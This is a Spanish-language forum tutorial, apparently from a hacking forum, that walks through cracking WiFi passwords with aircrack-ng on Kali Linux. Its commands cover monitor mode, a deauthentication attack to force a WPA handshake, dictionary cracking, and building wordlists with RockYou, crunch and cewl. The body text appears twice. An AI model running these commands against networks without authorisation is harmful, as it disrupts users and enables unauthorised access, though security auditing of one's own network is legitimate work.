dEEpEst
☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
- Joined
- Mar 29, 2018
- Messages
- 13,861
- Solutions
- 4
- Reputation
- 32
- Reaction score
- 45,552
- Points
- 1,813
- Credits
- 55,350
7 Years of Service
56%
Tutorial básico sobre cómo utilizar aircrack-ng para auditar tu red WiFi en Kali Linux.
Asumiré que ya estamos en KALI LINUX, si no lo estás deberás instalarlo en una máquina virtual, una participación o en Live CD (Live CD es mi opción preferida).
Empecemos!!
Paso 1: Configura tu tarjeta de red
Inicia sesión en tu sistema Kali Linux y abre una terminal.
Escribe el siguiente comando para listar tus interfaces de red:
Busca la interfaz que será utilizada para la auditoría (por ejemplo, wlan0). Ahora, pon tu tarjeta de red en modo monitor con estos comandos:
Verifica que la tarjeta de red esté en modo monitor con:
Paso 2: Busca redes WiFi disponibles
Usa el siguiente comando para buscar redes WiFi:
Cuando veas la red que deseas auditar, anota su BSSID y canal (CH).
Paso 3: Captura el handshake
Inicia la captura de paquetes con el siguiente comando (reemplaza [BSSID] y [canal] con la información obtenida en el paso anterior):
Ahora necesitas forzar un handshake, que es la autenticación entre un dispositivo y el router. Usa el siguiente comando en una nueva terminal (reemplaza [BSSID] por el correspondiente):
Si todo ha ido bien, airodump-ng capturará el handshake.
Paso 4: Cracking de la contraseña
Una vez capturado el handshake, utiliza aircrack-ng para intentar descifrar la contraseña. Necesitarás una lista de contraseñas, que puede ser generada o descargada de Internet. En este ejemplo, usaremos "wordlist.txt" como nuestra lista de contraseñas.
Aircrack-ng buscará en la lista de contraseñas hasta que encuentre una coincidencia o hasta que se agoten las contraseñas.
Pasos adicionales: Wordlist
El éxito de tu auditoría dependerá en gran medida de tener una buena lista de palabras, por eso haré algunas recomendaciones.
Descargar una lista de palabras preexistente: Hay varias listas de palabras disponibles en línea que puedes descargar. Un ejemplo famoso es la lista de RockYou, que contiene millones de contraseñas reales que fueron expuestas en una violación de datos de la empresa RockYou en 2009. Esta lista se incluye comúnmente en las distribuciones de Kali Linux en el directorio:
Crunch: Crunch es una herramienta de Kali Linux que te permite generar tu propia lista de palabras basada en los criterios que establezcas. Por ejemplo, podrías generar una lista de palabras que incluye todas las combinaciones posibles de 8 caracteres. Aquí tienes un ejemplo de cómo usar crunch (puedes modificar el comando según tus preferencias):
Esto generará una lista de palabras de 8 caracteres de longitud con los caracteres 0-9 y A-F.
Cewl: Cewl es otra herramienta que puedes usar para generar listas de palabras. Cewl crea listas de palabras basadas en el contenido de un sitio web. Aquí tienes un ejemplo de cómo usar Cewl:
Esto generará una lista de palabras basada en el contenido de www.example.com.
Recuerda que el cracking de contraseñas puede ser un proceso muy largo y que consume muchos recursos, y puede no tener éxito si la contraseña es lo suficientemente fuerte.
Como siempre está guía es con fines educativos y no me hago en ningún caso responsable del mal uso que se le pueda dar.
Asumiré que ya estamos en KALI LINUX, si no lo estás deberás instalarlo en una máquina virtual, una participación o en Live CD (Live CD es mi opción preferida).
Code:
https://www.kali.org/
Empecemos!!
Paso 1: Configura tu tarjeta de red
Inicia sesión en tu sistema Kali Linux y abre una terminal.
Escribe el siguiente comando para listar tus interfaces de red:
Code:
iwconfig
Code:
sudo airmon-ng start wlan0
Code:
iwconfig
Paso 2: Busca redes WiFi disponibles
Usa el siguiente comando para buscar redes WiFi:
Code:
sudo airodump-ng wlan0mon
Paso 3: Captura el handshake
Inicia la captura de paquetes con el siguiente comando (reemplaza [BSSID] y [canal] con la información obtenida en el paso anterior):
Code:
sudo airodump-ng -c [canal] --bssid [BSSID] -w ~/handshake wlan0mon
Code:
sudo aireplay-ng -0 2 -a [BSSID] wlan0mon
Paso 4: Cracking de la contraseña
Una vez capturado el handshake, utiliza aircrack-ng para intentar descifrar la contraseña. Necesitarás una lista de contraseñas, que puede ser generada o descargada de Internet. En este ejemplo, usaremos "wordlist.txt" como nuestra lista de contraseñas.
Code:
sudo aircrack-ng ~/handshake-01.cap -w ~/wordlist.txt
Pasos adicionales: Wordlist
El éxito de tu auditoría dependerá en gran medida de tener una buena lista de palabras, por eso haré algunas recomendaciones.
Descargar una lista de palabras preexistente: Hay varias listas de palabras disponibles en línea que puedes descargar. Un ejemplo famoso es la lista de RockYou, que contiene millones de contraseñas reales que fueron expuestas en una violación de datos de la empresa RockYou en 2009. Esta lista se incluye comúnmente en las distribuciones de Kali Linux en el directorio:
Code:
/usr/share/wordlists/rockyou.txt.gz
Code:
crunch 8 8 0123456789ABCDEF -o ~/wordlist.txt
Cewl: Cewl es otra herramienta que puedes usar para generar listas de palabras. Cewl crea listas de palabras basadas en el contenido de un sitio web. Aquí tienes un ejemplo de cómo usar Cewl:
Code:
cewl https://www.example.com -w ~/wordlist.txt
Recuerda que el cracking de contraseñas puede ser un proceso muy largo y que consume muchos recursos, y puede no tener éxito si la contraseña es lo suficientemente fuerte.
Como siempre está guía es con fines educativos y no me hago en ningún caso responsable del mal uso que se le pueda dar.
Last edited by a moderator: